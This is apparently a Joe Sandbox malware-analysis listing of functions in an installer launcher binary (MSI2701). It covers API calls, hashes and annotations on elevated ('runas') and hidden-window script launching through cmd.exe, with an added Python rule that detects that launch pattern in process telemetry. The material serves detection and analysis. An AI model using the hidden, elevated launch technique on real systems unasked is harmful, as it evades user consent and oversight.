• Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
Similarity
• API ID: InformationToken$ErrorLast
• String ID:
• API String ID: 2567405617-0
• Opcode ID: 04e7ed9e04d5f9af3a4f8284ca2666e2b29eb1b7203c1e9884435171d2b120c3
• Instruction ID: d2f8da5882e4a293e159ea3b4b85a43e878addf83c11dde4baa6436ff9677161
• Opcode Fuzzy Hash: 04e7ed9e04d5f9af3a4f8284ca2666e2b29eb1b7203c1e9884435171d2b120c3
• Instruction Fuzzy Hash: FA318F71A006099FD714CF99CC45BAFBBF9FB48710F10452EE515A7280D7B579448BA4

Control-flow Graph (rendered graph not reproduced): basic blocks 4f70bb-4f7117; RtlAllocateHeap in a retry loop with subroutines 4f5245 and 4fbf83 on the failure path and 4e7370 on exit.
APIs
• RtlAllocateHeap.NTDLL(00000008,?,?,?,004F596A,00000001,00000364,?,00000006,000000FF,?,004E6CE7,00000000,A8O,00000000), ref: 004F70FC
Memory Dump Source
• Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
• Opcode ID: 0863d09000eb1412b96b6c50ce78fe3303bb4159753321bcc50259565a539b48
• Instruction ID: 2bb31a55222769ca38d3bf377eeb042db3c4b8cc7216e124b6187575b3b76068
• Opcode Fuzzy Hash: 0863d09000eb1412b96b6c50ce78fe3303bb4159753321bcc50259565a539b48
• Instruction Fuzzy Hash: E9F0B43160C22C6ADB225B229D05B7B774DEF517B1B158117FF149A390CE2CEC0586E9

Control-flow Graph (rendered graph not reproduced): basic blocks 4c52f0-4c57ba; calls into internal subroutines 4c63a0, 4c5d30, 4c59c0, 4c11d0, 4c49a0, 4e7852, 4c5890, 4c5b30, 4c5b10, 4c64a0, 4c5940 and 4e2937, with two ShellExecuteExW sites (4c55f7 and 4c5625), a Sleep/EnumWindows loop ending in BringWindowToTop, and a WaitForSingleObject/GetExitCodeProcess path.
APIs
• GetWindowsDirectoryW.KERNEL32(?,00000104,00000000,?,?,?,?,?), ref: 004C549C
• GetForegroundWindow.USER32(00000000,?,?,?,?,?), ref: 004C551D
• ShellExecuteExW.SHELL32(?), ref: 004C5601
• ShellExecuteExW.SHELL32(?), ref: 004C5637
• GetModuleHandleW.KERNEL32(Kernel32.dll,GetProcessId,?,?,?,?,?,?), ref: 004C567C
• GetProcAddress.KERNEL32(00000000), ref: 004C5685
• AllowSetForegroundWindow.USER32(00000000), ref: 004C568B
• GetModuleHandleW.KERNEL32(Kernel32.dll,GetProcessId,?,?,?,?,?,?), ref: 004C56AB
• GetProcAddress.KERNEL32(00000000), ref: 004C56AE
• Sleep.KERNEL32(00000064,?,?,?,?,?,?), ref: 004C56CA
• EnumWindows.USER32(004C5830,?), ref: 004C56DF
• BringWindowToTop.USER32(00000000), ref: 004C56F4
• WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?), ref: 004C5711
• GetExitCodeProcess.KERNEL32(?,?), ref: 004C571B
Memory Dump Source
• Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
Similarity
• API ID: Window$AddressExecuteForegroundHandleModuleProcShellWindows$AllowBringCodeDirectoryEnumExitObjectProcessSingleSleepWait
• String ID: %s\System32\cmd.exe$.bat$.cmd$/C ""%s" %s"$<SQ$Directory:<$FilePath:<$GetProcessId$Hidden$Kernel32.dll$Parameters:<$ShellExecuteInfo members:$Verb:<$Visible$Window Visibility:$open$runas
Note: the strings show this function is the launcher. It builds "<windir>\System32\cmd.exe" (GetWindowsDirectoryW, buffer 0x104 = MAX_PATH) with the parameter string /C ""<script>" <args>" for a .bat or .cmd target, calls ShellExecuteExW with either the "open" or the "runas" verb (the latter triggers a UAC elevation), logs the SHELLEXECUTEINFO members it used (Verb, FilePath, Parameters, Directory, window visibility Hidden/Visible), resolves GetProcessId from Kernel32.dll at run time, brings the child's window to the foreground via the Sleep(100 ms)/EnumWindows loop and BringWindowToTop, and then waits on the child with WaitForSingleObject and collects its exit code.
• API String ID: 697762045-1319285285
• Opcode ID: 3464f6543471d6bee9960a24a1e6996370d2cb24d36132d57037e5124317d8a1
• Instruction ID: a27b425bf507880839110d8422e8c5e91b412a1042964e2a610b1bdf1eb7d97a
• Opcode Fuzzy Hash: 3464f6543471d6bee9960a24a1e6996370d2cb24d36132d57037e5124317d8a1
• Instruction Fuzzy Hash: 9CE1D339A00A09DBDB54DFA4C844FAEBBF1BF48314F54412EE815AB391E738AD81CB54

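The command-line shape the launcher function above builds ("<windir>\System32\cmd.exe" with /C ""<script>" <args>" for a .bat or .cmd target) is easy to hunt for in process-creation telemetry. The following is an added detection example written for this report; it is not code from Joe Sandbox or from the sample. The event dictionaries, their field names (ProcessId, ParentImage, Image, IntegrityLevel, CommandLine, modelled on Sysmon Event ID 1) and every path in them are constructed for the demonstration, including the parent name C:\Windows\Installer\MSI2701.tmp, which is only an assumption about where the snapshot's MSI2701 binary would live.

```python
# Added example, not code from the Joe Sandbox report or from the sample.
# Flags process-creation events whose command line has the shape built by
# the function at 004C52F0: "<windir>\System32\cmd.exe" run with the
# parameter string /C ""<script>" <args>" for a .bat or .cmd target.
# Event field names (ProcessId, ParentImage, Image, IntegrityLevel,
# CommandLine) follow Sysmon Event ID 1 and are an assumption about the
# log source; adapt the field access to your own telemetry.
import re
from typing import Optional

# The outer quote pair wraps the whole command and the inner pair wraps the
# script path, exactly as the format string /C ""%s" %s" produces.  The args
# group may be empty, which yields the trailing `" "` when no arguments are
# passed.  cmd.exe itself strips the outer pair before running the script.
_LAUNCH_RE = re.compile(
    r'^"?(?P<cmd>[^"\s]+\\System32\\cmd\.exe)"?\s+/C\s+'
    r'""(?P<script>[^"]+?\.(?:bat|cmd))"(?:\s(?P<args>[^"]*))?"\s*$',
    re.IGNORECASE,
)


def match_wrapper_launch(cmdline: str) -> Optional[dict]:
    """Return {cmd, script, args} if the command line matches, else None."""
    m = _LAUNCH_RE.match(cmdline.strip())
    if m is None:
        return None
    return {
        "cmd": m["cmd"],
        "script": m["script"],
        "args": (m["args"] or "").strip(),
    }


def scan(events: list[dict]) -> list[dict]:
    """Run the matcher over process-creation events and enrich each hit."""
    hits = []
    for ev in events:
        hit = match_wrapper_launch(ev.get("CommandLine", ""))
        if hit is None:
            continue
        hit["pid"] = ev.get("ProcessId")
        hit["parent"] = ev.get("ParentImage", "")
        # A script staged under a Temp directory is the case worth a closer look.
        hit["temp_script"] = "\\temp\\" in hit["script"].lower()
        # A High/System token on the child is what the "runas" verb path yields.
        hit["elevated"] = ev.get("IntegrityLevel", "") in ("High", "System")
        hits.append(hit)
    return hits


# Constructed sample events (not from the report).  Every path is made up;
# the parent name follows the C:\Windows\Installer\MSI<hex>.tmp custom-action
# convention and is an assumption.
SAMPLE_EVENTS = [
    {
        "ProcessId": 4212,
        "ParentImage": r"C:\Windows\Installer\MSI2701.tmp",
        "Image": r"C:\Windows\System32\cmd.exe",
        "IntegrityLevel": "High",
        "CommandLine": r'"C:\Windows\System32\cmd.exe" /C ""C:\Users\joe\AppData\Local\Temp\lavi.bat" "',
    },
    {
        # An interactive user shell running a plain command: must not match.
        "ProcessId": 4300,
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\cmd.exe",
        "IntegrityLevel": "Medium",
        "CommandLine": r'"C:\Windows\System32\cmd.exe" /C "dir C:\"',
    },
    {
        # Same launcher shape used by a legitimate vendor installer: matches,
        # but without the Temp-directory or elevation markers.
        "ProcessId": 4411,
        "ParentImage": r"C:\Windows\System32\msiexec.exe",
        "Image": r"C:\Windows\System32\cmd.exe",
        "IntegrityLevel": "Medium",
        "CommandLine": r'"C:\Windows\System32\cmd.exe" /C ""C:\Program Files\Vendor\setup.cmd" /quiet /norestart"',
    },
]


if __name__ == "__main__":
    for h in scan(SAMPLE_EVENTS):
        print(f"pid={h['pid']} parent={h['parent']} script={h['script']} "
              f"args={h['args']!r} temp={h['temp_script']} elevated={h['elevated']}")
```

The matcher is deliberately narrow: it keys on the doubled quotes that the /C ""%s" %s" format string produces, which ordinary `cmd /C "..."` invocations do not have, and leaves triage (Temp-staged script, elevated child, unusual parent) to the enrichment fields rather than the regex, so the same rule can be tuned per environment without rewriting it.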
APIs
• RegOpenKeyExW.ADVAPI32(?,?,00000000,00000001,?), ref: 004CCBB6
• RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,0051E6D0,00000800), ref: 004CCBD3
Note: the key is opened with KEY_QUERY_VALUE (0x1) and the value is read into a 0x800-byte buffer at 0051E6D0; the option strings below (/DIR, /DontWait, /EnforcedRunAsAdmin, /HideWindow, /LogFile, /RunAsAdmin) are the launcher's switches, so this function loads its run configuration, including whether to elevate, from the registry.
Memory Dump Source
• Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
Similarity
• API ID: OpenQueryValue
• String ID: /DIR $/DontWait $/EnforcedRunAsAdmin $/HideWindow$/LogFile$/RunAsAdmin
• API String ID: 4153817207-482544602
• Opcode ID: 73bb0f9310603da78a8cb40f4d2f383f993a1c72ee61f190ca8c8ebf57841502
• Instruction ID: 8b3ef24cbc4d178e158172eeb13157a8f747c3c046139dc8270e2095d1f169d3
• Opcode Fuzzy Hash: 73bb0f9310603da78a8cb40f4d2f383f993a1c72ee61f190ca8c8ebf57841502
• Instruction Fuzzy Hash: 8CC1F27C500216CACBA4AF14D881B7BB6A2FF90740F59845FE88D8B350F7399D82C799

APIs
  • Part of subcall function 004F57CC: GetLastError.KERNEL32(?,00000008,004FAD4C,?,?,?,?,00000000,?,?), ref: 004F57D0
  • Part of subcall function 004F57CC: SetLastError.KERNEL32(00000000,?,00000006,000000FF,?,?,?,?,00000000,?,?), ref: 004F5872
• GetACP.KERNEL32(?,?,?,?,?,?,004F42D9,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 004FDEE5
• IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,004F42D9,?,?,?,00000055,?,-00000050,?,?), ref: 004FDF10
• _wcschr.LIBVCRUNTIME ref: 004FDFA4
• _wcschr.LIBVCRUNTIME ref: 004FDFB2
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 004FE073
Strings
Memory Dump Source
• Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
Similarity
• API ID: ErrorLast_wcschr$CodeInfoLocalePageValid
• String ID: utf8
• API String ID: 4147378913-905460609
• Opcode ID: 4f45a6ee4ccf0a0babd1297b624cec187ea79360763abbd4b69a51ff08cb6510
• Instruction ID: 34d7ce39cca1545f1cc4fc7b157e534c4e5070e299ee148fa93636f6186e5091
• Opcode Fuzzy Hash: 4f45a6ee4ccf0a0babd1297b624cec187ea79360763abbd4b69a51ff08cb6510
• Instruction Fuzzy Hash: 6C710931A00719AAD724AF36CC45BBB73A9EF14709F10442BF706DB291EBBCD900C669
APIs
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,C7C71CC4,?), ref: 004C38CB
• CloseHandle.KERNEL32(00000000), ref: 004C390B
• Process32FirstW.KERNEL32(?,00000000), ref: 004C395F
• OpenProcess.KERNEL32(00000410,00000000,?), ref: 004C397A
• CloseHandle.KERNEL32(00000000), ref: 004C3A8E
• Process32NextW.KERNEL32(?,00000000), ref: 004C3AA2
• CloseHandle.KERNEL32(?), ref: 004C3AF0
Memory Dump Source
• Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
Similarity
• API ID: CloseHandle$Process32$CreateFirstNextOpenProcessSnapshotToolhelp32
• String ID:
• API String ID: 708755948-0
• Opcode ID: bc7b10fb7254a3e0914ac5d1ebf8febb41cd14a555fba57829574daa17241ac2
• Instruction ID: f433beda29cf48d6696e7ca91fe5df414ec991aeec885d445f050c73981c0ec5
• Opcode Fuzzy Hash: bc7b10fb7254a3e0914ac5d1ebf8febb41cd14a555fba57829574daa17241ac2
• Instruction Fuzzy Hash: CAA109B5901249DFDF10CFA5D988BDEBBF8BF48304F14815EE805AB240D7B95A44CBA4
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
Similarity
• API ID: __floor_pentium4
• String ID: 1#IND$1#INF$1#QNAN$1#SNAN
• API String ID: 4168288129-2761157908
• Opcode ID: dc1301c3c6ef149c33fa982cc7f06948027dffcee70ac48a0370fa3319f3f74f
• Instruction ID: ef60e1807b67fbc1fd2f6309078f785255d93c8df74c22e836b13e82cbdce80d
• Opcode Fuzzy Hash: dc1301c3c6ef149c33fa982cc7f06948027dffcee70ac48a0370fa3319f3f74f
• Instruction Fuzzy Hash: 1BD22871E082298BDB25CE28DD407EAB7B5FF44305F1445EAD90DE7280EB78AE858F45
APIs
• GetLocaleInfoW.KERNEL32(?,2000000B,004FE8D1,00000002,00000000,?,?,?,004FE8D1,?,00000000), ref: 004FE64C
• GetLocaleInfoW.KERNEL32(?,20001004,004FE8D1,00000002,00000000,?,?,?,004FE8D1,?,00000000), ref: 004FE675
• GetACP.KERNEL32(?,?,004FE8D1,?,00000000), ref: 004FE68A
Strings
Memory Dump Source
• Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
Similarity
• API ID: InfoLocale
• String ID: ACP$OCP
• API String ID: 2299586839-711371036
• Opcode ID: 0a9835047c84b0c0d1f9b010bdba7cf6c0923bb3a2d4bebfe10b98154bbb2b93
• Instruction ID: 5929a9128474423d0e923a23bfca82216f67999d51396abd8cfeda4a1a196317
• Opcode Fuzzy Hash: 0a9835047c84b0c0d1f9b010bdba7cf6c0923bb3a2d4bebfe10b98154bbb2b93
• Instruction Fuzzy Hash: 2921A93160010CAAEB34CF56C900ABB77A7AB74B66B968466EB09D7360E736DD41C358
APIs
Memory Dump Source
• Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
Similarity
• API ID: _swprintf$FreeLocal
• String ID:
• API String ID: 2429749586-0
• Opcode ID: 5eb3327ca18ffbe47527467d7fa325606c8baef36b557c110b2d29e978578ab5
• Instruction ID: dfcc9b5be4c1cfe954a0481b3d653b14196517e8553d94614c7761e09934b828
• Opcode Fuzzy Hash: 5eb3327ca18ffbe47527467d7fa325606c8baef36b557c110b2d29e978578ab5
• Instruction Fuzzy Hash: 92F1BA75E00219ABDF14DFA9DC44FAEBBB9FB48314F14422EF801A7281D739A941CB95
APIs
  • Part of subcall function 004F57CC: GetLastError.KERNEL32(?,00000008,004FAD4C,?,?,?,?,00000000,?,?), ref: 004F57D0
  • Part of subcall function 004F57CC: SetLastError.KERNEL32(00000000,?,00000006,000000FF,?,?,?,?,00000000,?,?), ref: 004F5872
• GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 004FE894
• IsValidCodePage.KERNEL32(00000000), ref: 004FE8DD
• IsValidLocale.KERNEL32(?,00000001), ref: 004FE8EC
• GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 004FE934
• GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 004FE953
Memory Dump Source
• Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
Similarity
• API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
• String ID:
• API String ID: 415426439-0
• Opcode ID: ccff26ff0e9f87790a735f4b2a4b66da4d4ef949786f15d1cdf8d41abce2eb0e
• Instruction ID: 31e0528eeedb3ba527a079502b143cc8b81f9b3282d823382d30f44e720d8b68
• Opcode Fuzzy Hash: ccff26ff0e9f87790a735f4b2a4b66da4d4ef949786f15d1cdf8d41abce2eb0e
• Instruction Fuzzy Hash: 59517471A0020DABEB10FFA7CC45ABF77B8FF58742F14446AAA00E72A1D7749904D765

APIs
  • Part of subcall function 004E2C98: EnterCriticalSection.KERNEL32(0051DD3C,?,?,?,004C23B6,0051E638,C7C71CC4,?,?,00503D6D,000000FF), ref: 004E2CA3
  • Part of subcall function 004E2C98: LeaveCriticalSection.KERNEL32(0051DD3C,?,?,?,004C23B6,0051E638,C7C71CC4,?,?,00503D6D,000000FF), ref: 004E2CE0
• GetProcessHeap.KERNEL32 ref: 004C2365
  • Part of subcall function 004E2C4E: EnterCriticalSection.KERNEL32(0051DD3C,?,?,004C2427,0051E638,00506B40), ref: 004E2C58
  • Part of subcall function 004E2C4E: LeaveCriticalSection.KERNEL32(0051DD3C,?,?,004C2427,0051E638,00506B40), ref: 004E2C8B
  • Part of subcall function 004E2C4E: RtlWakeAllConditionVariable.NTDLL ref: 004E2D02
Memory Dump Source
• Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
Similarity
• API ID: CriticalSection$EnterLeave$ConditionHeapProcessVariableWake
• String ID: <Q$XQ$\LQ$pLQ
• API String ID: 325507722-3596237423
• Opcode ID: 0da20be00a54135b0cf1165b2c77d8ed0103aee972bb7f84f243e01b581a4fa1
• Instruction ID: e40d342ec2187dba7748048b9034cd411b7a306f8fb3e0900b53b1bca274ec12
• Opcode Fuzzy Hash: 0da20be00a54135b0cf1165b2c77d8ed0103aee972bb7f84f243e01b581a4fa1
• Instruction Fuzzy Hash: 23217CB09012409BE310DF55FE07BC9BBB4FB34324F90821AEC29973E0D3B818489B55

APIs
Memory Dump Source
• Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
Similarity
• API ID: _strrchr
• String ID:
• API String ID: 3213747228-0
• Opcode ID: c088d6f79354faf8b1bce494a29b4de1bf964f76c3977490bbe1990304a04063
• Instruction ID: f27fc527a4d38b11c01d6873642ffa6f1be84d52580d32e10453a6247995920a
• Opcode Fuzzy Hash: c088d6f79354faf8b1bce494a29b4de1bf964f76c3977490bbe1990304a04063
• Instruction Fuzzy Hash: E2B169329046499FDB15CF28C881BFFBBA5EF55304F2581ABEB04AB341D6389D01CBA5

APIs
• IsProcessorFeaturePresent.KERNEL32(00000017), ref: 004E33B4
• IsDebuggerPresent.KERNEL32 ref: 004E3480
• SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 004E34A0
• UnhandledExceptionFilter.KERNEL32(?), ref: 004E34AA
Memory Dump Source
• Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
Similarity
• API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
• String ID:
• API String ID: 254469556-0
• Opcode ID: e367f8fcbaede1cda131bb796f381776cbb7109f2539a374d26169bb65bf363d
• Instruction ID: 15ded5397336e01ad8fbf139f3dcf0335836399ba3ce447db9e18b6e21e7376d
• Opcode Fuzzy Hash: e367f8fcbaede1cda131bb796f381776cbb7109f2539a374d26169bb65bf363d
• Instruction Fuzzy Hash: F4317875D0521C9BDB11DFA1D989BCDBBB8AF08305F1040EAE50CAB290EB749B89DF44

APIs
  • Part of subcall function 004CC630: InitializeCriticalSectionEx.KERNEL32(?,00000000,00000000,C7C71CC4,?,00503D30,000000FF), ref: 004CC657
  • Part of subcall function 004CC630: GetLastError.KERNEL32(?,00000000,00000000,C7C71CC4,?,00503D30,000000FF), ref: 004CC661
• IsDebuggerPresent.KERNEL32(?,?,00518AF0), ref: 004CD0D8
• OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,00518AF0), ref: 004CD0E7
Strings
• ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 004CD0E2
Memory Dump Source
• Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
Similarity
• API ID: CriticalDebugDebuggerErrorInitializeLastOutputPresentSectionString
• String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
• API String ID: 3511171328-631824599
• Opcode ID: f061de765ed5a7b4678c1b556729e60d508915174f44fdae0c232bc2af346274
• Instruction ID: 2a9ae3a4acdc83bc6bf60f589a5050eb6866d8990a52df6e66bb0ec0f27a14f1
• Opcode Fuzzy Hash: f061de765ed5a7b4678c1b556729e60d508915174f44fdae0c232bc2af346274
• Instruction Fuzzy Hash: ACE09B74A047418FD3A09F2AE508B467FE4BF14308F04C96EE485C2680D7B8E44DCBA5

APIs
  • Part of subcall function 004F57CC: GetLastError.KERNEL32(?,00000008,004FAD4C,?,?,?,?,00000000,?,?), ref: 004F57D0
  • Part of subcall function 004F57CC: SetLastError.KERNEL32(00000000,?,00000006,000000FF,?,?,?,?,00000000,?,?), ref: 004F5872
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004FE28B
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004FE2D5
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004FE39B
Memory Dump Source
• Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
Similarity
• API ID: InfoLocale$ErrorLast
• String ID:
• API String ID: 661929714-0
• Opcode ID: a4b0866684c04836046afa54c9467600aab7eeeceabb9b8a767edf821b0afb5e
• Instruction ID: a693ba451fe80c5d91f43afefe23648509f2d108c7e88d9567dd1de0bda05c4a
• Opcode Fuzzy Hash: a4b0866684c04836046afa54c9467600aab7eeeceabb9b8a767edf821b0afb5e
• Instruction Fuzzy Hash: 5261827150020BDBEB289F26CC86BBAB7A8EF14306F10417BEE05C62A5E77CD945CB54

APIs
• IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 004E6F13
• SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 004E6F1D
• UnhandledExceptionFilter.KERNEL32(-00000327,?,?,?,?,?,?), ref: 004E6F2A
Memory Dump Source
• Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmp
